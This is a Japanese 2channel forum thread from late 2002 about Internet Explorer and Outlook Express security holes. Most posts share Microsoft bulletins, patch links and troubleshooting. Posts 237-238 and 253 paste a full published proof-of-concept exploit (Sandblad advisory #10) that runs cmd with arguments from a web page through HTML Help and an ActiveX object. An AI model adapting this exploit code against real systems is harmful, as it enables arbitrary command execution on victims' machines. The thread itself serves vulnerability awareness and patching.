204 :名無しさん@お腹いっぱい。:02/10/13 10:36
>>203
馬鹿はOEでも使ってろ。

205 :名無しさん@お腹いっぱい。:02/10/13 12:05
まあ、理由も示さずに「OEは糞」と言ってる奴も多いわけだが。
相手を説得したいなら納得させる努力をしろよ。
そのためにはOEについて詳しく知る必要がある。

その点でこのスレッドは有用だと思う。

206 :名無しさん@お腹いっぱい。:02/10/13 15:38
メールを見ただけで、ウィルスにやられるOEは糞。

207 :名無しさん@お腹いっぱい。:02/10/13 16:56
>>206 かつてはね(今後もないという保証はないが…)。つーかアップデートしろよ(w

208 :名無しさん@お腹いっぱい。:02/10/14 10:21
>>206
(藁

209 :名無しさん@お腹いっぱい。:02/10/14 11:22
OEのおかげで儲かってます。今後ともセキュリティホールをよろしく。

                                          トレンドマイクロ
                                          シマンテック

210 :名無しさん@お腹いっぱい。:02/10/15 01:57
>>209
セキュリティーホールはウイルスだけじゃないんだが・・・・・・

211 :名無しさん@お腹いっぱい。:02/10/17 11:10
証明書確認の問題により、ID が偽装される (Q328145) (MS02-050)
Microsoft Office 2001 for Mac および Microsoft Office 98 for Macintosh
Edition の問題を修正するプログラムを公開しました。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp
対象:Microsoft(R) Windows、Office for Mac、Internet Explorer for Mac
または Outlook Express for Mac

212 :名無しさん@お腹いっぱい。:02/10/17 11:17
     パーソナルセキュリティ研究所
    ・ポートスキャン
  http://210.143.99.143/~p-sec/pscan.html
    ・Windows診断
  http://210.143.99.143/~p-sec/winsec.html

213 :名無しさん@お腹いっぱい。:02/10/26 12:13


214 :名無しさん@お腹いっぱい。:02/11/07 10:07
ほす

215 :名無しさん@お腹いっぱい。:02/11/20 08:25
マイクロソフト,セキュリティ・ホールの深刻度に関する評価方法を変更
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021119/2/
マイクロソフトは11月19日,同社が公開する「セキュリティ情報」において,その
深刻度の評価方法を変更した。従来は「高(High)」,「中(Moderate)」,
「低(Low)」の3段階であったものを,「緊急(Critical)」,「重要(Important)」,
「警告(Moderate)」,「注意(Low)」の4段階にする。

http://www.microsoft.com/japan/technet/security/policy/rating.asp
http://www.microsoft.com/technet/security/policy/rating.asp

216 :MS02-065:02/11/21 11:11
MS02-065 に関する情報
「MS02-065: Microsoft Data Access Components のバッファ オーバーラン
により、コードが実行される (Q329414)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、Microsoft Data Access Components (MDAC) に含まれる
Remote Data Services (RDS) コンポーネントでの文字列の処理に含まれる
未チェックのバッファにより、不正なプログラムが実行される可能性が
あります。
対象となる製品
==============
・Microsoft Data Access Components (MDAC) 2.1
・Microsoft Data Access Components (MDAC) 2.5
・Microsoft Data Access Components (MDAC) 2.6
・Internet Explorer 5.01
・Internet Explorer 5.5
・Internet Explorer 6

つづく

217 :MS02-065:02/11/21 11:11
つづき

以下の OS を利用しているユーザーは修正プログラムをインストールする
必要があります。
・Windows 98
・Windows 98 Second Edition
・Windows Millennium Edition
・Windows NT4.0
・Windows 2000
MDAC 2.7 および Windows XP はこの問題の影響を受けません。
MDAC のバージョンの確認方法については次の技術情報をご覧ください。
JP301202 [HOW TO] MDAC のバージョンを確認する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;JP301202

修正プログラム
==============
・Microsoft Data Access Components (MDAC)
http://download.microsoft.com/download/dasdk/Patch/Q329414/W98NT42KMe/EN-US/q329414_mdacall_x86.exe

218 :MS02-066 IEの累積的修正プログラム(Q328970):02/11/21 11:14
MS02-066 に関する情報
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-047 : Internet Explorer 用の累積的な
修正プログラム (Q323759) で修正された問題に加えて、新たに 6 つの問題を
排除します。
対象となる製品
==============
・ Internet Explorer 6、6 Service Pack 1
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
修正プログラム
==============
・ Internet Explorer 6 Service Pack 1
http://download.microsoft.com/download/ie6sp1/30secpac/6_sp1/W98NT42KMeXP/JA/q328970.exe
・ Internet Explorer 6
http://download.microsoft.com/download/IE60/30secpac/6/W98NT42KMeXP/JA/q328970.exe
・ Internet Explorer 5.5 Service Pack 2
http://download.microsoft.com/download/ie55sp2/30secpac/5.5_sp2/W98NT42KMe/JA/q328970.exe
・ Internet Explorer 5.01 Service Pack 3
http://download.microsoft.com/download/ie501sp2/30secpac/5.01_sp3/NT5/JA/q328970.exe

219 :名無しさん@お腹いっぱい。:02/11/21 12:22
MS込んj

220 :名無しさん@お腹いっぱい。:02/11/21 12:29
>>216-218
お疲れさん。ありがとう。

221 :名無しさん@お腹いっぱい。:02/11/21 13:16
>>216-217のMS02-065は深刻度(緊急)だから該当者はすぐに対処した方がよさそうだね。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp
>>218のMS02-066は最大深刻度(重要)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp

222 :実験台は????:02/11/21 14:31
 

223 :名無しさん@お腹いっぱい。:02/11/21 14:44
MDなんたらってのはサーバー立てしてない奴は関係ないんでしょ?

224 :名無しさん@お腹いっぱい。:02/11/21 14:48
>>223
対策が行われていないシステムがインターネットなどのネットワークを通
じて他のコンピュータと接続している場合、この問題を悪用した攻撃を受
けることがあります。この攻撃は、受動的攻撃という悪意のあるユーザー
から送られた HTML 形式の電子メールからも攻撃を受ける可能性がありま
す。この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザー
や、ワームといった自動的な攻撃を目的とした悪意のあるプログラムから
行われることがあります。
・Internet Explorer に想定する実害
意図しないアプリケーションが動作させられる可能性があります。その結
果、ワームの感染、データの削除、トロイの木馬の実行などが考えられま
す。

225 :名無しさん@お腹いっぱい。:02/11/21 14:53
>>224
テムプファイル形式とは違うの?

今MDのやつインスト完了。

226 :名無しさん@お腹いっぱい。:02/11/21 16:36
http://download.microsoft.com/download/ie6sp1/30secpac/6_sp1/W98NT42KMeXP/JA/q328970.exe
このパッチ当たらない。「SP1が必要です」って言われる。
さっきSP1入れたばっかなのに。

227 :名無しさん@お腹いっぱい。:02/11/21 16:40
>>226 再起動してみ

228 :bloom:02/11/21 16:41

http://www.agemasukudasai.com/bloom/

229 :名無しさん@お腹いっぱい。:02/11/21 17:55
>>216-218の解説記事
データベース・アクセス機能に重大なセキュリティ・ホール,
Windows XP以外のほとんどのシステムが危険
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20021121/3/

マイクロソフト,IE向け最新セキュリティ・パッチを公開
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20021121/2/

230 :226:02/11/21 18:27
>>227
してみたけどやっぱり駄目ですた
仕様なのか…?


231 :名無しさん@お腹いっぱい。:02/11/21 18:45
>>230 いや、いまIE6SP1に当ててみたが「SP1が必要です」とは出なかった。
まずIEのバージョンがSP1か確認してそうでなかったらもう一度IE6SP1にする。
SP1の表示がなされていたらInternet Explorerの修復をしてみる。
それでもだめならIE6SP1の再インスコ。

うまくパッチが当たったらバージョン情報にはSP1; Q328970;と表示される。

232 :名無しさん@お腹いっぱい。:02/11/21 19:56
Win95の場合、MS02-065のパッチは諦めるしかないのでしょうか?

233 :名無しさん@お腹いっぱい。:02/11/21 20:17
>>232
もうサポート対象外。

234 :名無しさん@お腹いっぱい。:02/11/21 20:55
http://www.microsoft.com/downloads/release.asp?releaseid=44662
入れた俺のOE SP1は
http://memo.st.ryukoku.ac.jp/archive/200211.month/4998.html
が発生しないわけだが、既出?

235 :226:02/11/21 23:46
>>231
亀レスですがありがとう
やっぱ再インスコですか・・・
ナローには10Mはつらい・・・( ´Д⊂ヽ

236 :名無しさん@お腹いっぱい。:02/11/22 00:55
証明書確認の問題により、ID が偽装される (Q329115) (MS02-050)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-050.asp
MS02-065, MS02-066 にかくれて、コソッと修正の修正がでてるから注意! 最大深刻度 : 重要
直リン倶楽部
・Windows 98 PC/AT 互換機用
ttp://download.microsoft.com/download/win98/Update/25897/W98/JA/329115JPN8.EXE
・Windows 98 Second Edition PC/AT 互換機用
ttp://download.microsoft.com/download/win98/Update/25897/W98/JA/329115JPN8.EXE
・Windows Millennium Edition
ttp://download.microsoft.com/download/winme/Update/25897/WinMe/JA/329115JPNM.EXE
・Windows 2000 PC/AT 互換機用
ttp://download.microsoft.com/download/win2000platform/patch/Q329115/nt5/ja/Q329115_W2K_SP4_X86_JA.exe
・Windows XP and Windows XP 64 Bit Edition
ttp://download.microsoft.com/download/whistler/Patch/Q329115/WXP/JA/Q329115_WXP_SP2_x86_JPN.exe


237 : :02/11/22 01:26
http://archives.neohapsis.com/archives/bugtraq/2002-11/0041.html
http://sec.greymagic.com/adv/gm012-ie/
http://archives.neohapsis.com/archives/bugtraq/2002-11/0047.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0114.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0126.html
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';




238 :237:02/11/22 01:27
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
--------------------------- CUT HERE ---------------------------

239 :名無しさん@お腹いっぱい。:02/11/22 01:37
>>237
W2kSP2/IE6SP1でヘルプ表示されただけなんだけど。。。。なんで??
c:/vulnerable.txtなんて無かったぞ。。

240 :再掲:02/11/22 11:57
「MS02-065: Microsoft Data Access Components のバッファ オーバーランにより、コードが実行される (Q329414)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp
証明書確認の問題により、ID が偽装される (Q329115) (MS02-050)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-050.asp

241 :名無しさん@お腹いっぱい。:02/11/23 09:39
Windows Updateを使わずにインストールしたセキュティパッチは
Windows Updateのインストール履歴には表示されませんよね?
ヘルプ→バージョン情報では適用されていても表示されない
修正プログラムもあるみたいですし

(MS02-XXX)の問題を修正する修正プログラム(QXXXXXX):適用済み

みたいな感じで一覧表示できる機能はないものですかねえ。

242 :名無しさん@お腹いっぱい。:02/11/23 09:49
>>241
俺のマシンにはQFECHECK.EXEつーのが入ってるけど入手経路は忘れた。MS御謹製な事は確実だが。

243 :名無しさん@お腹いっぱい。:02/11/23 11:17
>>241
「アプリケーションの追加と削除」に全部出るだろ?

244 :名無しさん@お腹いっぱい。:02/11/27 20:55
パッチを無効にされる恐れあり
Windowsの深刻なセキュリティ・ホールを解説する

ほとんどのWindowsシステムが影響を受ける深刻なセキュリティ・ホールが公開
された。今回のコラムでは,このセキュリティ・ホールの詳細や対策方法について
解説したい。注意しなければならないのは,修正パッチを適用するだけでは万全
といえないことだ。パッチが“無効化”される恐れがある。万全の対策を施せない
間は,Internet Explorerなどの利用を中止することも考慮したい。それほどまでに
深刻なセキュリティ・ホールなのだ。
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021126/1/

245 :名無しさん@お腹いっぱい。:02/11/27 20:58
>>244関連
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/fq02-065.asp

246 :名無しさん@お腹いっぱい。:02/11/27 22:33
IEを削除。心穏やかに暮らせます。

247 :名無しさん@お腹いっぱい。:02/11/27 23:21
過去アップデートのデジタル証明書がそのまま上書き利用されるってわけね。
これは盲点だったなMS。見つけたときにはガクガクブルブルだっただろう。
対策機能としてKillBitとかいってるけど、これも名前からして
なんか容易くフラグをいじられてしまいそうな感もある(w

248 :名無しさん@お腹いっぱい。:02/11/28 04:07
Operaってセキュリティホールないの?

249 :名無しさん@お腹いっぱい。:02/11/28 09:11
>>248 以前のOpera6.01や6.02にはあったよ。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020528/1/
現在の6.05ではまだ発見されて無いみたい。

250 :名無しさん@お腹いっぱい。:02/11/28 11:00
Microsoft Data Access Components のバッファ オーバーランにより、
コードが実行される (Q329414) (MS02-065) 【最大深刻度 : 緊急】
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-065.asp

●修正パッチを当てるよりもMDACを2.7にすることを推奨。理由:>>244

http://support.microsoft.com/default.aspx?scid=kb;ja;JP301202
でMDACのバージョンを確認して2.7以外ならMDAC2.7をインストール。
http://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/developer/data/download.asp

参考:http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/fq02-065.asp

251 :名無しさん@お腹いっぱい。:02/11/28 17:11
>>244>>250関連 詳細な適用条件が紹介されている。
http://www.st.ryukoku.ac.jp/security/vuln.htmlの2002.11.26の項

252 :328970:02/11/28 22:25
http://archives.neohapsis.com/archives/bugtraq/2002-11/0041.html
http://sec.greymagic.com/adv/gm012-ie/
http://archives.neohapsis.com/archives/bugtraq/2002-11/0047.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0114.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0126.html

253 : Exploit:02/11/28 22:28
<script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umuse
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';


if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>

254 :名無しさん@お腹いっぱい。:02/11/28 23:59
>>253
HHは秋田、RDSの貼れよ。

255 :sned:02/11/29 06:51
( ・_・)y─~~~ pcにメールを入れない hotmailかyahooを使う

が、hotmailはメルアドしれたら見られる可能性大...

urlにメアド入れて...( ・×・)y─~~~

256 :名無しさん@お腹いっぱい。:02/11/29 15:20
IE累積パッチをめぐる議論で思うこと
http://www.zdnet.co.jp/news/0211/28/cead_vamosi.html
>先週発行されたIE用の累積パッチをめぐって取りざたされている問題がある。
>シロクロはさておき、この問題は情報の公開・非公開について考える良いきっかけだ


257 :名無しさん@お腹いっぱい。:02/11/29 17:01
>>255
おい、ホトメはセキュリティ対策とってないんか?

258 :名無しさん@お腹いっぱい。:02/12/03 06:51
漏れら極悪非道のageブラザーズ!
今日もネタもないのにageてやるからな!
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ∧_∧   ∧_∧    age
 (・∀・∩)(∩・∀・)    age
 (つ  丿 (   ⊂) age
  ( ヽノ   ヽ/  )   age
  し(_)   (_)J


259 :名無しさん@Emacs:02/12/04 13:18
>> http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021203/1/
> 今度は“完全な対策”にとんでもない副作用――「Windowsの深刻なホール」続編
> MDAC 2.7へのアップグレードで過去のホールが再発する


260 :MS02-068:02/12/05 10:19
「MS02-068: Internet Explorer 用の累積的な修正プログラム (324929) 」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068ov.asp
概要
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-066 : Internet Explorer 用の累積的な修正プログラム
(Q328970) で修正された問題に加えて、新たに 1つの問題を排除します。
対象となる製品
・ Microsoft Internet Explorer 5.5 Service Pack 2
・ Microsoft Internet Explorer 6
・ Microsoft Internet Explorer 6 Service Pack 1
Microsoft Internet Explorer 5.01 は、この問題の影響を受けません。

261 :名無しさん@お腹いっぱい。:02/12/05 13:25
>>259 なんだかワケわからん状態になってきてるよね(w
もう少し整理して欲しいね。
ttp://www.st.ryukoku.ac.jp/security/vuln.html#20021126のほうが整理されてる。

262 :名無しさん@お腹いっぱい。:02/12/06 11:15
>>260 Windows Updateでなかなか落ちてこないことがあるようなので、
【修正プログラム】
・ Internet Explorer 6 Service Pack 1
http://download.microsoft.com/download/ie6sp1/32secpac/6_sp1/W98NT42KMeXP/JA/q324929.exe
・ Internet Explorer 6
http://download.microsoft.com/download/IE60/32secpac/6/W98NT42KMeXP/JA/q324929.exe
・ Internet Explorer 5.5 Service Pack 2
http://download.microsoft.com/download/ie55sp2/32secpac/5.5_sp2/W98NT42KMe/JA/q324929.exe
注意: 64bit 版の Windows XP は、以下の Internet Explorer 6 Service Pack 1 (64bit) の適用をすること。
・Internet Explorer 6 Service Pack 1 (64bit)
http://download.microsoft.com/download/ie6sp1/32secpac/6_sp1/W64XP/JA/q324929.exe

修正プログラムのダウンロード方法およびインストール方法については、こちら
http://www.microsoft.com/japan/security/square/guard/a04g16.asp

263 :名無しさん@お腹いっぱい。:02/12/06 13:18
MS02-067,MS02-068解説
『IEとOutlook 2002にセキュリティ・ホール,深刻度はいずれも「警告」』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021205/1/

264 :名無しさん@Emacs:02/12/06 14:35
>>261

こういう先祖帰りしたライブラリを見付けてくれるソフトってあるかな。

265 :名無しさん@お腹いっぱい。:02/12/07 00:34
>>259
リンクに入れないよー。何度やってもクッキーOKにしても跳ね返される。

266 :名無しさん@お腹いっぱい。:02/12/07 00:41
>>265
もちろん会員登録はしてるんだろうな

267 :名無しさん@お腹いっぱい。:02/12/07 00:51
>>266
入れました。最近いかないのでクッキー常拒否&制限サイト設定してました。
制限サイト設定がだめだったみたい。このサイト異常に大量のクッキーほしがる
からなんかやなんだよねえ。スレ汚しスマソ。

268 :名無しさん@お腹いっぱい。:02/12/07 00:54
>>259
あちら隠せばこちら隠せず、みたいな。M$勘弁してください…。
最近HDDに増えているのはパッチばかり

269 :名無しさん@お腹いっぱい。:02/12/07 02:12
ひとつひきだしを閉めると
違うひきだしが飛び出る

・・・えんえんと続く

「誰か来てー!こっち押さえてるから そっち閉めてー!!」

270 :MS02-068:02/12/07 12:39
Internet Explorer 用の累積的な修正プログラム (324929) (MS02-068)
深刻度を「警告」から「緊急」に変更
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp

緊急 (Critical):
この脆弱性が悪用された場合、Code Red や Nimda のようなインターネット
ワームがユーザーの操作なしで蔓延する可能性があります。
重要 (Important):
この脆弱性が悪用された場合、ユーザーのデータの機密性、完全性または
アベイラビリティが侵害される可能性があります。または、処理中のリソースの
完全性またはアベイラビリティが侵害される可能性があります。
警告 (Moderate):
この脆弱性が悪用された場合、既定の構成、監査または悪用が困難であること
などの要素により、悪用される可能性は大幅に緩和されます。
注意 (Low):
この脆弱性の悪用は非常に困難です。または影響はわずかです。

271 :名無しさん@Emacs:02/12/07 12:46
>>270
> http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp

Internet Explorer 5.01 なし
Internet Explorer 5.5 緊急
Internet Explorer 6.0 緊急

どういうプログラミングしてんだよ。

272 :名無しさん@お腹いっぱい。:02/12/07 15:25
これ、前に当てたのを手直ししたからもういっぺん当てなおせってことなのか?

273 :名無しさん@お腹いっぱい。:02/12/07 15:35
324929を落としてみてもう一度当ててみたが、再起動要求がなかった。
ってことはすでに当たってたってことか。よくわからんな。

274 :名無しさん@お腹いっぱい。:02/12/07 15:38
>>272-273
注意、修正プログラムが正しくインストールされたかどうか確認する方法 、
更新履歴を嫁。

275 :名無しさん@お腹いっぱい。:02/12/07 15:44
>>272-273 MS02-068 Q324929は深刻度の変更のみ。修正プログラムには変更なし。
すでにパッチ適用済みの人は不要。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp

276 :272-273:02/12/07 23:23
>>274-275
了解しますた。アリが屯。

277 :名無しさん@お腹いっぱい。:02/12/08 15:59
age

278 :名無しさん@お腹いっぱい:02/12/09 05:48
Microsoft VM JDBC クラスの問題により、コードが実行される (Q329077) (MS02-052) は、Windows Update以外に、ダウンロードできないのでしょうか?

279 :名無しさん@お腹いっぱい。:02/12/09 05:50
レジストで、TSHOOT.TSHOOTCtrl.1 を検索してみて。
TSHOOT.TSHOOTCtrl.1 が ActiveX/COM
{4B106874-DD36-11D0-8B44-00A024DD9EFF}を参照しているのが
おかしいらしいが、、、(ウインドクター)。
もし、あったら、、、、ブルブル、、?

280 :名無しさん@お腹いっぱい。:02/12/09 08:43
>>278 調べればすぐにわかることを・・・
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/current.asp
>このセキュリティ修正プログラムは特殊なものであり、Windows Update
>からのみ入手可能となっております。


281 :280:02/12/09 08:45
リンクはこっちだな。
http://www.microsoft.com/japan/technet/security/bulletin/MS02-052.asp?frame=true

282 :名無しさん@お腹いっぱい。:02/12/09 12:12
>>260>>270 q324929 MS02-068深刻度変更の解説

IEのセキュリティ・ホール,深刻度を最悪の「緊急」に変更
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021209/1/

283 :名無しさん@お腹いっぱい。:02/12/10 08:17
age

284 :名無しさん@Emacs:02/12/11 12:25
>> 「ウイルスバスター」にバッファ・オーバーフロー
>> http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/
> 製品が備えるメール検索機能で使用するポートに,直接接続されて大量の文字列を送信されると,バッファ・オーバーフローが発生



285 :名無しさん@お腹いっぱい。:02/12/11 16:42
「Windowsの深刻なホール」対策で発生するトラブルを解決する
 トラブル相次ぐMDAC 2.7へのアップグレード,「警告」への対処がOSによって異なる
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021210/1/
>ようやく正確な情報が出揃った「Windowsの深刻なホール」であるが,トラブル
>はまだ続いている。“完全な対策”であるはずの MDAC 2.7 へのアップグレー
>ドがきちんと 実施できないケースが頻発しているようだ。アップグレード時に
>警告が出た場合の適切な対処方法が,Windows 95/95SE/NT 4.0 と Windows
>2000などでは異なることが原因だ。アップグレードできずに頭を抱えているユー
>ザーは,今回のコラムを一読してほしい。併せて今回のコラムでは,深刻度が
>「緊急」に急きょ変更されたInternet Explorer(IE)のセキュリティ・ホー
>ルなどについても解説する。

286 :名無しさん@お腹いっぱい。:02/12/12 08:31
>>264関係 Microsoft Baseline Security Analyzer v1.1
http://pcweb.mycom.co.jp/news/2002/12/09/10.html
使ってみた人いる?

>IE5.01以降がインストールされたWindows 2000およびWindows XP上で動作し、
>次に挙げるシステムやソフトウェアをチェックできる。
>・Windows NT4.0(SP4以降)/2000/XP
>・Internet Information Server 4.0/5.0
>・SQL Server 7.0/2000
>・Internet Explorer 5.01以降
>・Office 2000/XP

287 :名無しさん@お腹いっぱい。:02/12/12 08:51
マイクロソフト,Netscapeでセキュリティ情報を閲覧できない問題に対応
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021211/1/

288 :名無しさん@お腹いっぱい。:02/12/12 16:04
810030 Microsoft VMセキュリティ問題の修正プログラム 5.1MB
っていうのがWindows Updateで来てるね。現時点では詳細不明。

必要システム
Windows XP、Windows Millennium Edition、Windows NT(R) 4.0
Windows 98 Second Edition、Windows 98、Windows 95


289 :名無しさん@お腹いっぱい。:02/12/12 16:11
>>288 英語情報発見。最大深刻度:緊急
http://www.microsoft.com/technet/security/bulletin/MS02-069.asp

290 :名無しさん@お腹いっぱい。:02/12/12 16:53
緊急と言われてもまったく落ちてこない、、、
直リンキボン

291 :名無しさん@お腹いっぱい。:02/12/12 16:57
>>290 漏れも落ちてこない。
人柱になりたいのでなければ日本語情報が出てしばらくした頃にUpdate
すれば医院で内科医。

292 :名無しさん@お腹いっぱい。:02/12/12 17:04
しばらく待ったら落ちてきました。

293 :bloom:02/12/12 17:04

http://www.agemasukudasai.com/bloom/

294 :名無しさん@お腹いっぱい。:02/12/12 17:34
ルータでポート135番塞いでたら、インストールに失敗した(恥
それにしてもWindowsUpdate重いぞ。

295 :名無しさん@お腹いっぱい。:02/12/12 17:36
>>290
痺れを切らして(5分待ち)途中でキャンセルしたらIE固まった。
正確には固まったというよりも、キャンセル処理が長い感じ。
これほんとに7分(ADSL8M実際は1.5Mくらい)で落ちるのか??

296 :名無しさん@お腹いっぱい。:02/12/12 17:40
こっち↓にはまだ出ないね。VMの話だからIEの欄にもでるはずだよね?
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/fix/ie6sp1.asp



297 :名無しさん@お腹いっぱい。:02/12/12 18:13
「MS02-069: Microsoft VM の問題により、システムが侵害される(810030)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-069ov.asp
「MS02-070: SMB 署名の問題により、グループ ポリシーが変更される (309376)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-070ov.asp
「MS02-071: Windows WM_TIMER メッセージ処理の問題により、権限がし昇格する(328310)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-071ov.asp

298 :名無しさん@お腹いっぱい。:02/12/12 18:15
×し昇格
○昇格

299 :名無しさん@お腹いっぱい。:02/12/12 21:37
MS02-069解説
Microsoft VMに「緊急」のセキュリティ・ホ ール,Windowsユーザーはすぐに対策を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021212/1/

300 :名無しさん@お腹いっぱい。:02/12/12 21:55

「MS02-070: SMB 署名の問題により、グループ ポリシーが変更される (309376)」

(329170) の誤りだ>M$ まぁた間違えてやんの(w

301 :名無しさん@Emacs:02/12/12 22:15
http://www.pivx.com/larholm/unpatched/ ここには載ってない様だから新た
な奴らか。

マイクロソフトは12月12日,Windows OSやInternet Explorer(IE)などに含まれるJava仮想マシン「Microsoft VM」に8種類のセキュリティ・ホールがあることを明らかにした。

1. COMオブジェクトにアクセスされるセキュリティ・ホール
2. Codebase を偽装される2種類のセキュリティ・ホール
3. ダウンロードするサイトを偽装されるセキュリティ・ホール
4. JDBC API に関するセキュリティ・ホール
5. セキュリティ・マネージャの設定を無視できるセキュリティ・ホール
6. User.dirに関するセキュリティ・ホール
7. Java オブジェクトのインスタンスを作成されるセキュリティ・ホール

302 :名無しさん@お腹いっぱい。:02/12/12 23:54
windows update のほうではまだDLできんみたいだな。

303 :名無しさん@お腹いっぱい。:02/12/13 00:26
やっとDLできた。疲れる。

304 :名無しさん@お腹いっぱい。:02/12/14 16:47
>>297
http://www.microsoft.com/japan/technet/security/bulletin/ms02-071.aspもきついな。
共有マシンのAdminの意味無いな。

305 :名無しさん@お腹いっぱい。:02/12/14 17:08
Adminisutrator のユーザー名をそのままにしている香具師、
多いんだろう。
ユーザー名の変更ができるんだから、名前を NIMDA にしてもよい。

306 :名無しさん@お腹いっぱい。:02/12/14 17:10
× Adminisutrator
○ Administrator

307 :MS02-066,MS02-068:02/12/16 23:10
MS02-066 更新、最大深刻度 : 緊急に変更
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066.asp
但しMS02-068 に既に含まれている。MS02-068の累積的パッチの適用を推奨。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-068.asp

308 :名無しさん@Emacs:02/12/17 18:30
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021217/1/
Flash Playerにバッファ・オーバーフローのセキュリティ・ホール
対策は,最新バージョン6.0.65.0にバージョンアップすること。
影響を受けるのは,バージョン6.0.65.0未満

309 :名無しさん@お腹いっぱい。:02/12/17 19:27
itiou sure tigai jya naino?>>308

310 :名無しさん@お腹いっぱい。:02/12/18 18:48
IPAが年末警報。特にIE/OEユーザ向けの記述になっている。
初心者に読ませるのにいいかも。

年 末 警 報−添付ファイルにご用心− −メールを選択しただけでも感染!!−
http://www.ipa.go.jp/security/topics/alert141218.html

311 :cheshire-cat ◆PhCATJR.v6 :02/12/18 20:17
>>310
そこ、ええですねん。

>ファイルを添付する場合は、必ず本文で一言触れる。
あまり守られていないマナーですが、これって重要だったりしますねん。

312 :名無しさん@Emacs:02/12/18 21:13
http://www.eeye.com/html/Research/Advisories/AD20021216.html
Macromedia Shockwave Flash Malformed Header Overflow #2
A corrupt file may be placed on a website or in some cases within an HTML email.

313 :名無しさん@お腹いっぱい。:02/12/19 09:18
スレ違いスマソ。
「MS02-072: Windows Shell の未チェックのバッファによりシステムが侵害される (329390)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-072ov.asp
対象となる製品
・Windows XP Home Edition
